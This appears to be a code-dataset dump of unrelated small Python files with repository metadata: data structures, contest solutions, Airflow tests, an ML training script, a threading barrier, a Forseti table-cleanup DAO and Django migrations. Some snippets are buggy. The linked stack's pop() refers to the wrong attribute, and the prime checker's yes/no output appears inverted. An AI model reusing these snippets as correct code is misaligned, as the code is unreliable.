2019-11-27T04:42:28
226,782,243
0
0
null
null
null
null
UTF-8
Python
false
false
773
py
""" lstack.py 栈的链式结构 重点代码 思路: 1. 源于节点存储数据,建立节点关联 2. 封装方法 入栈 出栈 栈空 栈顶元素 3. 链表的开头作为栈顶(不需要每次遍历) """ # 自定义异常 class StackError(Exception): pass # 创建节点类 class Node: def __init__(self,val,next=None): self.val = val # 有用数据 self.next = next # 节点关系 # 链式栈 class LStack: def __init__(self): # 标记顶位置 self._top = None def is_empty(self): return self._top is None def push(self,val): node=Node(val) node.next=self._top self._top=node def pop(self): temp=self._top.val self.top=self.top.next return temp
[ "769358744@qq.com" ]
769358744@qq.com
143a773bbbec049d6b12a6406b50a9fce3cdd585
26dec2f8f87a187119336b09d90182d532e9add8
/mcod/resources/documents.py
da3e92fb9c8f6d9a843336fb6541b7e1b3f9d460
[]
no_license
olekstomek/mcod-backend-dane.gov.pl
7008bcd2dbd0dbada7fe535536b02cf27f3fe4fd
090dbf82c57633de9d53530f0c93dddf6b43a23b
refs/heads/source-with-hitory-from-gitlab
2022-09-14T08:09:45.213971
2019-05-31T06:22:11
2019-05-31T06:22:11
242,246,709
0
1
null
2020-02-24T22:39:26
2020-02-21T23:11:50
Python
UTF-8
Python
false
false
2,197
py
from django.apps import apps
from django_elasticsearch_dsl import DocType, Index, fields

from mcod import settings
from mcod.lib.search.fields import TranslatedTextField

# Resolve models lazily through the app registry (avoids import cycles).
Resource = apps.get_model('resources', 'Resource')
Dataset = apps.get_model('datasets', 'Dataset')
TaskResult = apps.get_model('django_celery_results', "TaskResult")

# Elasticsearch index for resources, configured from project settings.
INDEX = Index(settings.ELASTICSEARCH_INDEX_NAMES['resources'])
INDEX.settings(**settings.ELASTICSEARCH_DSL_INDEX_SETTINGS)

# Table-schema description of a resource's tabular data: per-column
# name/type/format plus the marker used for missing values.
data_schema = fields.NestedField(attr='schema', properties={
    'fields': fields.NestedField(properties={
        'name': fields.KeywordField(attr='name'),
        'type': fields.KeywordField(attr='type'),
        'format': fields.KeywordField(attr='format')
    }),
    'missingValue': fields.KeywordField(attr='missingValue')
})


@INDEX.doc_type
class ResourceDoc(DocType):
    """Elasticsearch document mapping for the Resource model."""
    id = fields.IntegerField()
    slug = fields.TextField()
    uuid = fields.TextField()
    # Translated title also feeds the completion suggester.
    title = TranslatedTextField('title', common_params={'suggest': fields.CompletionField()})
    description = TranslatedTextField('description')

    file_url = fields.TextField(
        attr='file_url'
    )
    download_url = fields.TextField(
        attr='download_url'
    )
    link = fields.TextField()
    format = fields.KeywordField()
    file_size = fields.LongField()
    type = fields.KeywordField()
    openness_score = fields.IntegerField()

    # Denormalised parent dataset data for display/filtering.
    dataset = fields.NestedField(properties={
        'id': fields.IntegerField(),
        'title': TranslatedTextField('title'),
        'slug': TranslatedTextField('slug')
    })

    views_count = fields.IntegerField()
    downloads_count = fields.IntegerField()
    status = fields.TextField()
    modified = fields.DateField()
    created = fields.DateField()
    verified = fields.DateField()
    data_date = fields.DateField()

    class Meta:
        doc_type = 'resource'
        model = Resource
        related_models = [Dataset, ]

    def get_instances_from_related(self, related_instance):
        # When a Dataset changes, reindex all of its resources.
        if isinstance(related_instance, Dataset):
            return related_instance.resources.all()

    def get_queryset(self):
        # Only published resources are indexed.
        return self._doc_type.model.objects.filter(status='published')
[ "piotr.zientarski@britenet.com.pl" ]
piotr.zientarski@britenet.com.pl
4668b524700dbf55e3711938e6cfd959affaa864
57ddfddd1e11db649536a8ed6e19bf5312d82d71
/AtCoder/ABC1/ABC123/ABC123-A.py
04402036b76e6ab088ca47d8dcc146c57c639e4d
[]
no_license
pgDora56/ProgrammingContest
f9e7f4bb77714dc5088c2287e641c0aa760d0f04
fdf1ac5d1ad655c73208d98712110a3896b1683d
refs/heads/master
2023-08-11T12:10:40.750151
2021-09-23T11:13:27
2021-09-23T11:13:27
139,927,108
0
0
null
null
null
null
UTF-8
Python
false
false
191
py
# AtCoder ABC123 A: read five values, then a threshold K.
# Print ':(' when the spread (max - min) exceeds K, 'Yay!' otherwise.
values = [int(input()) for _ in range(5)]
threshold = int(input())

spread = max(values) - min(values)
if spread > threshold:
    print(':(')
else:
    print('Yay!')
[ "doradora.prog@gmail.com" ]
doradora.prog@gmail.com
d8cd32918e0332ff185300fa7e171a9a68f0cdd3
7ce076dd764fe4b5c7881734f157bc6f77a99ead
/tests/providers/exasol/operators/test_exasol.py
68e3d121b48bccf3971c3dd9c3a0247ac1f8a694
[ "Apache-2.0", "BSD-3-Clause", "MIT", "Python-2.0" ]
permissive
kaxil/airflow
db31c98e23f2e0d869d857484e56a7c58acef231
42f1da179db00491610946a0b089dd82269adc74
refs/heads/master
2023-04-28T04:46:38.478352
2020-09-28T20:51:16
2020-09-28T20:51:16
112,322,392
1
1
Apache-2.0
2020-08-27T20:15:22
2017-11-28T10:42:19
Python
UTF-8
Python
false
false
1,922
py
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.

import unittest
# Fix: use the standard-library mock (Python 3.3+) instead of the
# third-party `mock` backport the file previously imported.
from unittest import mock

from airflow.providers.exasol.operators.exasol import ExasolOperator


class TestExasol(unittest.TestCase):
    """Unit tests for ExasolOperator.

    Verifies that execute() forwards sql/autocommit/parameters to the
    hook's run() and that a custom schema reaches the hook constructor.
    """

    @mock.patch('airflow.providers.exasol.hooks.exasol.ExasolHook.run')
    def test_overwrite_autocommit(self, mock_run):
        operator = ExasolOperator(task_id='TEST', sql='SELECT 1',
                                  autocommit=True)
        operator.execute({})
        mock_run.assert_called_once_with('SELECT 1', autocommit=True,
                                         parameters=None)

    @mock.patch('airflow.providers.exasol.hooks.exasol.ExasolHook.run')
    def test_pass_parameters(self, mock_run):
        operator = ExasolOperator(task_id='TEST', sql='SELECT {value!s}',
                                  parameters={'value': 1})
        operator.execute({})
        mock_run.assert_called_once_with('SELECT {value!s}', autocommit=False,
                                         parameters={'value': 1})

    @mock.patch('airflow.providers.exasol.operators.exasol.ExasolHook')
    def test_overwrite_schema(self, mock_hook):
        operator = ExasolOperator(task_id='TEST', sql='SELECT 1',
                                  schema='dummy')
        operator.execute({})
        mock_hook.assert_called_once_with(exasol_conn_id='exasol_default',
                                          schema='dummy')
[ "noreply@github.com" ]
noreply@github.com
6f233f3437f6dad2837d92f9c1bdd17ab312e768
b32ab366f637cf28c7235905affb10ef1831472e
/Project_Part2/train.py
067ad4dd1aef1dafd55ccbb244b50318b9be1928
[]
no_license
miloooooz/Information_Retrieval_and_Web_Search
523eaadddb40d060a2384cce2a8819bff9985a2d
a8070d3ac84d095a2c3f61fcc6b204aba3add1a3
refs/heads/master
2021-03-07T02:20:41.758503
2020-03-10T10:46:06
2020-03-10T10:46:06
246,239,799
1
1
null
null
null
null
UTF-8
Python
false
false
1,451
py
## Import Necessary Modules... import pickle from pprint import pprint import project_part2_redo as project_part2 ## Read the data sets... ### Read the Training Data train_file = './Data/train.pickle' train_mentions = pickle.load(open(train_file, 'rb')) ### Read the Training Labels... train_label_file = './Data/train_labels.pickle' train_labels = pickle.load(open(train_label_file, 'rb')) ### Read the Dev Data... (For Final Evaluation, we will replace it with the Test Data) dev_file = './Data/dev.pickle' dev_mentions = pickle.load(open(dev_file, 'rb')) ### Read the Parsed Entity Candidate Pages... fname = './Data/parsed_candidate_entities.pickle' parsed_entity_pages = pickle.load(open(fname, 'rb')) ### Read the Mention docs... mens_docs_file = "./Data/men_docs.pickle" men_docs = pickle.load(open(mens_docs_file, 'rb')) ## Result of the model... result = project_part2.disambiguate_mentions(train_mentions, train_labels, train_mentions, men_docs, parsed_entity_pages) # result ## We will be using the following function to compute the accuracy... def compute_accuracy(result, data_labels): assert set(list(result.keys())) - set(list(data_labels.keys())) == set() TP = 0.0 for id_ in result.keys(): if result[id_] == data_labels[id_]['label']: TP +=1 assert len(result) == len(data_labels) return TP/len(result) accuracy = compute_accuracy(result, train_labels) print("Accuracy = ", accuracy)
[ "zhouruijun0510@hotmail.com" ]
zhouruijun0510@hotmail.com
8c36fc26a272f071d2585e8f26ae41f860d794bf
85381529f7a09d11b2e2491671c2d5e965467ac6
/OJ/Leetcode/Algorithm/54. Spiral Matrix.py
877d512e72cd9a17631f7f49ff7225fae0269c52
[]
no_license
Mr-Phoebe/ACM-ICPC
862a06666d9db622a8eded7607be5eec1b1a4055
baf6b1b7ce3ad1592208377a13f8153a8b942e91
refs/heads/master
2023-04-07T03:46:03.631407
2023-03-19T03:41:05
2023-03-19T03:41:05
46,262,661
19
3
null
null
null
null
UTF-8
Python
false
false
688
py
# -*- coding: utf-8 -*-
# @Author: HaonanWu
# @Date:   2017-03-03 10:57:26
# @Last Modified by:   HaonanWu
# @Last Modified time: 2017-03-03 11:01:34

class Solution(object):
    def spiralOrder(self, matrix):
        """
        Return all elements of `matrix` in clockwise spiral order.

        :type matrix: List[List[int]]
        :rtype: List[int]

        Improvement: the caller's matrix is no longer mutated (the old
        version popped rows/elements off the input lists).  Handles
        empty, single-row/column and rectangular matrices.
        """
        result = []
        rows = matrix
        while rows:
            # Consume the top row...
            result += list(rows[0])
            # ...then rotate the remainder counter-clockwise (transpose
            # + reverse), so the next "top row" is the old right column.
            rows = [list(col) for col in zip(*rows[1:])][::-1]
        return result
[ "whn289467822@outlook.com" ]
whn289467822@outlook.com
8e324a32f92a18daf3d929c2bada111d0e6ec1de
89d7bd51638bb3e8ca588062af1a3ec4870efd55
/Tasks/DmitryKozhemyachenok/classwork1/sam.py
67d9756d85b736503f30c388de6595853f0e1a1b
[]
no_license
Kori3a/M-PT1-38-21
9aae9a0dba9c3d1e218ade99f7e969239f33fbd4
2a08cc4ca6166540dc282ffc6103fb7144b1a0cb
refs/heads/main
2023-07-09T20:21:32.146456
2021-08-19T17:49:12
2021-08-19T17:49:12
null
0
0
null
null
null
null
UTF-8
Python
false
false
785
py
import itertools

# Number words mapped to their integer values (0..20).
WORD_TO_NUM = {"zero": 0, "one": 1, "two": 2, "three": 3, "four": 4,
               "five": 5, "six": 6, "seven": 7, "eight": 8, "nine": 9,
               "ten": 10, "eleven": 11, "twelve": 12, "thirteen": 13,
               "fourteen": 14, "fifteen": 15, "sixteen": 16,
               "seventeen": 17, "eighteen": 18, "nineteen": 19,
               "twenty": 20}

# Translate the space-separated words from stdin into numbers.
numbers = [WORD_TO_NUM[word] for word in input().split()]
print(numbers)

# Sort and drop duplicates (groupby over a sorted list yields unique keys).
numbers = [key for key, _ in itertools.groupby(sorted(numbers))]
print("без повторений", numbers)

# For each adjacent pair: product at even indices, sum at odd ones.
for idx in range(len(numbers) - 1):
    if idx % 2 == 0:
        print("проивзедение", numbers[idx] * numbers[idx + 1])
    else:
        print("сумма", numbers[idx] + numbers[idx + 1])

# Total of all odd values.
print("суммавсех", sum(value for value in numbers if value % 2 == 1))
[ "dmitriikozhemyachenok@mail.ru" ]
dmitriikozhemyachenok@mail.ru
55095ee0ea77fe40bd4ed68f53cd486d3d782b2d
fb235cccecab5368074bc43ed8677025f925dceb
/notebooks/westgrid/cffi_practice/__init__.py
6a5ba61abdb1177997fc7a77bffbd803fbab65cb
[]
no_license
sbowman-mitre/parallel_python_course
88a5f767de2f0f630d48faf94983fad51ecbe50f
85b03809c9725c38df85b0ac1e9b34cc50c0dc54
refs/heads/master
2022-01-04T18:29:12.443568
2019-11-29T16:08:06
2019-11-29T16:08:06
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,313
py
# import version for use by setup.py
from ._version import version_info, __version__  # noqa: F401 imported but unused
from pathlib import Path
import os


def get_paths(*args, **kwargs):
    """Locate the installed cffi_funs shared library and headers.

    Looks inside the active conda environment (``$CONDA_PREFIX``) for
    the ``libcffi_funs`` shared library (``.so`` or ``.dll``) and the
    environment's include directory.

    Returns:
        dict with string values under keys ``libfile``, ``libdir`` and
        ``includedir``, or ``None`` when any of those paths is missing
        (i.e. cffi_funs is not installed in this environment).

    Fixes applied: resolved the unresolved git merge conflict that made
    this module a SyntaxError (kept the HEAD branch, which globs for the
    platform-specific library), removed a leftover pdb.set_trace() and
    the duplicate ``import pdb``.
    """
    binpath = Path(os.environ['CONDA_PREFIX'])
    libdir = binpath / Path('lib')
    #
    # find either libcffi_funs.so or libcffi_funs.dll
    #
    library = list(libdir.glob('libcffi_funs.*'))
    if len(library) > 1:
        raise ImportError('found more than one libcffi_funs library')
    try:
        libfile = library[0]
    except IndexError:
        # fall back to a bare name so the existence check below fails
        # with a helpful message instead of crashing here
        libfile = Path('libcffi_funs')
    includedir = Path.joinpath(binpath.parent, Path('include'))
    for the_path in [libfile, libdir, includedir]:
        if not the_path.exists():
            print(f"couldn't find {str(the_path)}. Did you install cffi_funs?")
            out_dict = None
            break
    else:
        out_dict = dict(libfile=str(libfile), libdir=str(libdir),
                        includedir=str(includedir))
    return out_dict
[ "paustin@eos.ubc.ca" ]
paustin@eos.ubc.ca
b2d1398b1871c9a27671f1b06ceffc99159ba998
21a5a58e19a989a7301c3d658c707608071725b2
/train.py
42396ce06a89820b1dfd94fcc756b4ecc3f91125
[]
no_license
Meneville/fast-weights-test
0787c40de1144166dfab84aecc4f289a1acb984a
1a3e04d504b379263235a8a805dd7049b0a0406a
refs/heads/main
2023-05-31T02:30:37.208511
2021-07-09T12:57:06
2021-07-09T12:57:06
384,435,172
1
0
null
null
null
null
UTF-8
Python
false
false
2,189
py
# ---------------------------------------------------------------------------
# 0. import
# ---------------------------------------------------------------------------
import os
import tensorflow as tf
import numpy as np
import _pickle as pickle

from dataset import DataGenerator
from model import fw_rnn_model
from utils import *   # provides reset_seed and loss_fn

# ---------------------------------------------------------------------------
# 1. parameters
# ---------------------------------------------------------------------------
STEP_NUM = 9
ELEM_NUM = 26 + 10 + 1   # assumed a-z + 0-9 + one extra symbol -- TODO confirm
BATCH_SZ = 128
HID_NUM = 50
SEED = 7777
MODEL = 'fw_rnn_model'

# Fix: look the model constructor up in an explicit registry instead of
# eval()-ing the config string -- eval on config values is unsafe and a
# typo would only surface as a confusing NameError at runtime.
MODEL_REGISTRY = {'fw_rnn_model': fw_rnn_model}

model_path = './checkpoint/' + MODEL
log_path = './log/' + MODEL

learning_rate = 1e-4
epochs = 1000

reset_seed(SEED)

# ---------------------------------------------------------------------------
# 2. Create Dataset
# ---------------------------------------------------------------------------
with open(os.path.join('data', 'train.p'), 'rb') as f:
    x_train, y_train = pickle.load(f)
with open(os.path.join('data', 'valid.p'), 'rb') as f:
    x_val, y_val = pickle.load(f)

train_gen = DataGenerator(x_train, y_train, BATCH_SZ, shuffle=False)
val_gen = DataGenerator(x_val, y_val, BATCH_SZ, shuffle=False)
# test_gen = DataGenerator(x_test, y_test, BATCH_SZ, shuffle=False)

# ---------------------------------------------------------------------------
# 3. Train
# ---------------------------------------------------------------------------
opt = tf.keras.optimizers.Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999,
                               clipnorm=0.1)

model = MODEL_REGISTRY[MODEL](BATCH_SZ, STEP_NUM, ELEM_NUM, HID_NUM)
model.summary()
model.compile(loss={'output': loss_fn}, optimizer=opt, metrics=['accuracy'])

# Keep only the best weights (by validation accuracy) and log every epoch.
checkpoint = tf.keras.callbacks.ModelCheckpoint(model_path,
                                                monitor='val_accuracy',
                                                verbose=1,
                                                save_best_only=True,
                                                mode='max',
                                                save_weights_only=True)
csv_logger = tf.keras.callbacks.CSVLogger(log_path, append=True, separator=',')
callbacks_list = [checkpoint, csv_logger]

model.fit(train_gen, epochs=epochs, verbose=1, callbacks=callbacks_list,
          validation_data=val_gen)
[ "chen_qh@zju.edu.cn" ]
chen_qh@zju.edu.cn
aea3a266f96e0e510e291772736803d003de39c4
08c4415606e2a06593c8d837c746d79f6e2645a9
/heart-disease.py
efc62dbf34d98220f689e6ce4b503bd804b3bd26
[]
no_license
vanphuoc9/heart-disease
2f018074f8f7f177f0a125f79af03f70d61d1c6c
713efcfbd1e41ec29364d5e5889da98d76fd5101
refs/heads/master
2020-03-26T11:39:01.224150
2018-09-03T04:26:52
2018-09-03T04:26:52
144,852,615
0
0
null
null
null
null
UTF-8
Python
false
false
1,988
py
import pandas as pd
import numpy as np
import sklearn
from sklearn.preprocessing import Imputer
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
# Gaussian Naive Bayes classifier from scikit-learn
from sklearn.naive_bayes import GaussianNB
from sklearn.preprocessing import StandardScaler

model = GaussianNB()

# Read the data from file; '?' marks missing values.
dataset = pd.read_csv("Heart_Disease_Data.csv", na_values="?", low_memory=False)

# Collapse target classes 1..4 into a single "disease present" class 1.
dataset["pred_attribute"].replace(inplace=True, value=[1, 1, 1, 1],
                                  to_replace=[1, 2, 3, 4])

# Split into the 13 feature columns and the target column.
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values

# Replace missing feature values with the column mean.
my_imputer = Imputer(missing_values='NaN', strategy='mean', axis=0)
my_imputer = my_imputer.fit(X[:, 0:13])
X[:, 0:13] = my_imputer.transform(X[:, 0:13])

# Standardise features to zero mean / unit variance.
scaler = StandardScaler()
X = scaler.fit_transform(X)

# Hold-out split.
X_train, X_test, y_train, y_test = train_test_split(X, y)

# Fix: train the model ONCE here instead of refitting inside every
# ReadData() call (the original refit on the same data per prediction,
# which was wasteful; predictions are unchanged since GaussianNB is
# deterministic for fixed training data).
model.fit(X_train, y_train)

print(X)


def ReadData(age, sex, cp, trestbps, chol, fbs, restecg, thalach, exang,
             oldpeak, slop, ca, thal):
    """Predict the heart-disease class (0/1) for one patient record.

    The 13 arguments are the raw feature values in dataset column order.
    NOTE(review): the features are NOT scaled here although the model was
    trained on scaled data -- this mirrors the original behaviour; confirm
    whether `scaler.transform` should be applied before predicting.
    """
    sample = np.array([age, sex, cp, trestbps, chol, fbs, restecg, thalach,
                       exang, oldpeak, slop, ca, thal]).reshape(1, 13)
    dubao = model.predict(sample)
    return dubao[0]


print(ReadData(65, 0, 4, 150, 225, 0, 2, 114, 0, 1, 2, 3, 7))
# print ("Do chinh xac tong the: ",accuracy_score(thucte,dubao))
#### KNN
##to choose the right K we build a loop witch examen all the posible values for K.
[ "thaiphuoc1997@gmail.com" ]
thaiphuoc1997@gmail.com
b4f4e6f565e7d55f59c7f5d9117c3a4e0ea4a4ae
53f733c092e24610d864fa66a2741311b3b31209
/google/cloud/security/common/data_access/forseti_system_dao.py
56807d33a930a37da8a06da90dcb1256c46fbd86
[ "Apache-2.0" ]
permissive
shimizu19691210/forseti-security
a4860e30aa8a097b23d262d7a82fe2bca951a955
a6a1aa7464cda2ad5948e3e8876eb8dded5e2514
refs/heads/master
2021-04-15T06:07:42.110629
2018-03-21T21:40:05
2018-03-21T21:40:05
126,314,876
1
0
Apache-2.0
2018-03-22T09:57:54
2018-03-22T09:57:53
null
UTF-8
Python
false
false
2,279
py
# Copyright 2017 The Forseti Security Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Provides the data access object (DAO) for Forseti system management.""" from google.cloud.security.common.data_access import dao # pylint: disable=line-too-long from google.cloud.security.common.data_access.sql_queries import cleanup_tables_sql from google.cloud.security.common.util import log_util LOGGER = log_util.get_logger(__name__) class ForsetiSystemDao(dao.Dao): """Data access object (DAO) for Forseti system management. Args: global_configs (dict): Global config - used to lookup db_name """ def __init__(self, global_configs=None): dao.Dao.__init__(self, global_configs) self.db_name = global_configs['db_name'] def cleanup_inventory_tables(self, retention_days): """Clean up old inventory tables based on their age Will detect tables based on snapshot start time in snapshot table, and drop tables older than retention_days specified. Args: retention_days (int): Days of inventory tables to retain. """ sql = cleanup_tables_sql.SELECT_SNAPSHOT_TABLES_OLDER_THAN result = self.execute_sql_with_fetch( cleanup_tables_sql.RESOURCE_NAME, sql, [retention_days, self.db_name]) LOGGER.info( 'Found %s tables to clean up that are older than %s days', len(result), retention_days) for row in result: LOGGER.debug('Dropping table: %s', row['table']) self.execute_sql_with_commit( cleanup_tables_sql.RESOURCE_NAME, cleanup_tables_sql.DROP_TABLE.format(row['table']), None)
[ "henryc@google.com" ]
henryc@google.com
a3441c62140e4ceb7659e27c0851434d9ba88215
2272c4d8b34807da78ed419c53bf4325ad8ca289
/Bariera.py
93dd573c989711a63be80a2867949c7d4b793f58
[]
no_license
Konradox/Barrier
c5a26745f909763d364f0edec2cb329ba55e38ff
015f0bef411a73eb561475960e8100751fbc6c30
refs/heads/master
2020-03-27T19:31:16.561492
2015-02-10T21:24:01
2015-02-10T21:24:01
30,615,254
0
0
null
null
null
null
UTF-8
Python
false
false
1,624
py
# -*- coding: utf-8 -*- __author__ = 'Konrad' import threading import time class myThread(threading.Thread): threadCounter = 0 barrierCounter = 0 exitCounter = 0 lock = threading.Lock() cv = threading.Condition(lock) def __enter__(self): return self def __init__(self, threadID, name): threading.Thread.__init__(self) self.threadID = threadID self.name = name with myThread.lock: myThread.threadCounter += 1 def run(self): print(self.name + " is starting.") time.sleep(self.threadID * 2) print(self.name + " is ending.") self.barrier() print(self.name + " - ended") @staticmethod def barrier(): myThread.cv.acquire() myThread.barrierCounter += 1 while myThread.barrierCounter < myThread.threadCounter: myThread.cv.wait() myThread.exitCounter += 1 if myThread.exitCounter >= myThread.threadCounter: myThread.exitCounter = 0 myThread.barrierCounter = 0 myThread.cv.notify_all() myThread.cv.release() def __exit__(self, exc_type, exc_val, exc_tb): with myThread.lock: myThread.threadCounter -= 1 with myThread(1, "Thread 1") as t1, myThread(2, "Thread 2") as t2, myThread(3, "Thread 3") as t3: t1.start() t2.start() t3.start() t1.join() t2.join() t3.join() with myThread(1, "Thread 4") as t1, myThread(2, "Thread 5") as t2, myThread(3, "Thread 6") as t3: t1.start() t2.start() t3.start() t1.join() t2.join() t3.join()
[ "xkonradox@gmail.com" ]
xkonradox@gmail.com
26c80160665467234f7e9f9bac615e1f9a40f3ec
4cc2b3ba7d7b87a57ba1d4c5532426d5c6676bf1
/product/migrations/0002_auto_20210609_1621.py
c9e0653bfda3267fe361ec7c2eeed7d81838c27c
[]
no_license
Bhavesh852/Order
5cba5bb4a02db9fd9d7d2f681bcaa2126c82a3ac
92383e555f5b3fac4549e45ba1510c8355d6e621
refs/heads/master
2023-05-15T05:16:47.297902
2021-06-09T14:11:05
2021-06-09T14:11:05
375,373,577
0
0
null
null
null
null
UTF-8
Python
false
false
981
py
# Generated by Django 3.0.8 on 2021-06-09 10:51 from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('product', '0001_initial'), ] operations = [ migrations.AlterField( model_name='order', name='created_date', field=models.DateTimeField(default=django.utils.timezone.now, editable=False), ), migrations.AlterField( model_name='order', name='total_price', field=models.DecimalField(decimal_places=2, max_digits=10), ), migrations.AlterField( model_name='order', name='unit_price', field=models.DecimalField(decimal_places=2, max_digits=6), ), migrations.AlterField( model_name='product', name='unit_price', field=models.DecimalField(decimal_places=2, max_digits=6), ), ]
[ "bchandora60@gmail.com" ]
bchandora60@gmail.com
34bfcc6b015aa99b68b4193b7ac4abc2d22eca43
46304762aa4dea478008545fcecff88dd56df13e
/build/lib/A22DSE/Parameters/Par_Class_All.py
1dea22730931f0c10b07e4f0c9252d0577681645
[]
no_license
ThomasRV/A22CERES
12551a00be887a68e744523a4c7b548405346b3a
21c1d1889ef402bd23668493a1a4c6acec344f58
refs/heads/master
2020-05-31T11:44:38.858255
2019-06-04T15:00:50
2019-06-04T15:00:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,375
py
# -*- coding: utf-8 -*- """ Created on Mon May 13 11:37:54 2019 @author: hksam """ #import sys #sys.path.append('../../') #from A22DSE.Models.AnFP.Current.InitialSizing.AnFP_Exec_initsizing import WSandTW #from A22DSE.Models.POPS.Current.cruisecalculations import CruiseRange, CruiseTime #from A22DSE.Models.POPS.Current.cruisecalculations import CruiseRange, CruiseTime class ParAnFPLst(object): def __init__(self): self.A = None #[-] DUMMY VALUE self.e = None #[-] DUMMY VALUE self.CD0 = None #[-] DUMMY VALUE self.S = None #[m_squared] DUMMY VALUE #cruise parameters self.TtoW = None #[-] air to fuel ratio by POPS self.Mdd = None #[-] self.h_cruise = 20000. self.M_cruise = None #[-] DUMMY VALUE cruise mach number by POPS self.s_cruise = None self.V_cruise = None self.t_cruise = None self.CL_cruise = 1.2 #[-] DUMMY VALUE self.CL_max_cruise = 1.5 self.c_j = 0.6/3600 #[s^-1] DUMMY VALUE self.SFC = 16*10e-6 #[kg/N/s] DUMMY VALUE self.LD = 16 #[-] DUMMY VALUE #takeoff parameters self.CL_to = 1.8 #[-] DUMMY VALUE cruise mach number by POPS self.CD_to = 0.1 #[-] DUMMY VALUE cruise mach number by POPS self.fieldlen_to = 2500 #m self.rho_SL = 1.225 #[kg/m3] self.T_to = None #[N] DUMMY self.Vr = 50 #[m/s] DUMMY #landing parameters self.CL_land = 2.8 #[-] DUMMY VALUE self.CD_land = 0.3 #[-] DUMMY VALUE cruise mach number by POPS self.fieldlen_land = 2500 #m def Get_V_cruise(self): return self.s_cruise/self.t_cruise class ParCntrlLst(object): def __init__(self): self.placeholder = None class ParStrucLst(object): def __init__(self): self.MTOW = None #[kg] self.FW = None #[kg] #Fuel weight self.N_engines = 2 #[-] #ratios self.OEWratio = 1/2.47 #[-] self.wfratioclimb = 0.8 class ParPayloadLst(object): def __init__(self): self.disperRatePerTime = None self.airtofuel = 6 #[-] air to fuel ratio by POPS self.m_sulphur = 10000. 
#[kg] sulphur mass per flight by POPS self.rho_sulphur = 1121 #[kg/m^3] density of solid sulphur by POPS self.rho_alu = 2700 #[kg/m^3] density of aluminium by POPS self.dispersionrate = 8e-3 #[kg/m] class ParCostLst(object): def __init__(self): #Cost parameters self.CEF8919 = 284.5/112.5 #[USD/hr] self.CEF7019 = 284.5/112.5+3.02 #[USD/hr] self.Fmat= 2.25 self.rer = 62 #[USD/hr] CEF00/CEF89 self.rmr = 34 #[USD/hr] CEF00/CEF89 self.rtr = 43 #[USD/hr] CEF00/CEF89 self.Fdiff = 1.5 #[-] self.Fcad = 0.8 #[-] self.Nrdte= 6 #[-] nr of test ac, between 2-8 self.Nst = 2 #[-] nr of static test ac self.Fobs = 1 #[-] self.Fpror = 0.1 #[-] self.Ffinr = 0.05 #[-] self.Ftsf = 0.2 #CHECK VALUE!!!!! self.Cavionics = 30000000 #CHECK VALUE self.Nrr = 0.33 #[-] self.Nprogram = 150 #[-] self.Nrm = 11/12 #[-] self.tpft = 10 #[hrs] self.Fftoh = 4.0 #[-] self.FfinM = 0.10 #[-] class ParConvLst(object): def __init__(self): self.ft2m = 0.3048 #[ft/m] self.lbs2kg = 0.453592 #[lbs/kg] self.mile2m = 1609.34 #[miles/meter] self.gallon2L = 3.78541 #[-] self.kts2ms = 0.514444444 #[-] class ParSensitivityAnalysis(object): def __init__(self): self.N_cont_lines = 10 self.N_colours = 10 self.X_steps = 10 self.Y_steps = 10 class Aircraft(object): def __init__(self): # LOAD ALL classes self.ParPayload = ParPayloadLst() self.ParAnFP = ParAnFPLst() self.ParCntrl = ParCntrlLst() self.ParCostLst = ParCostLst() self.ParStruc = ParStrucLst() self.ConversTool = ParConvLst() self.ParSens = ParSensitivityAnalysis()
[ "noutvdbos@gmail.com" ]
noutvdbos@gmail.com
a3c0fbf2706cd04d397ed4f4e27f4e86f007625e
d302dc1cdb3f514d08cc812529b542da4ec7c2ae
/Prime.py
c48ea98bcbac66c0ea23679b9a4fadf13cb4320c
[]
no_license
Rahan13/CODE_KATA_PLAYER
8f5bcdb429a484e951a11a257139709b8926ae10
7f1e40214a344cc4416f092959f6a7fa514d23fb
refs/heads/master
2020-06-05T10:28:51.237104
2019-07-11T03:23:10
2019-07-11T03:23:10
192,409,548
0
0
null
null
null
null
UTF-8
Python
false
false
144
py
# Trial division over [2, num): print "yes" on the first divisor found,
# "no" when the loop completes without finding one.
# NOTE(review): for a prime this prints "no" -- the labels look inverted
# relative to the filename (Prime.py); output preserved as-is.
num = int(input())
for divisor in range(2, num):
    if num % divisor == 0:
        print("yes")
        break
else:
    # No divisor found (loop ran to completion, or was empty for num <= 2).
    print("no")
[ "noreply@github.com" ]
noreply@github.com
7d7e17f1be39a1bce373f6aa4892368c83bdc96a
693ae5945a34ac9487e40c478a1cabb6f4ef7eb6
/quantum/tests/unit/test_routerserviceinsertion.py
633629f27ecdfca8ce29f30623a22f723f39806d
[ "Apache-2.0" ]
permissive
yy2008/quantum
292f7a5cc1c78ce97ba8b5e6211f7bd6dad2a46a
b590f9dd560978ab8cee2da7bee96f29e2f307f7
refs/heads/master
2021-01-24T00:54:11.916086
2013-02-22T06:16:42
2013-02-22T06:16:42
null
0
0
null
null
null
null
UTF-8
Python
false
false
16,397
py
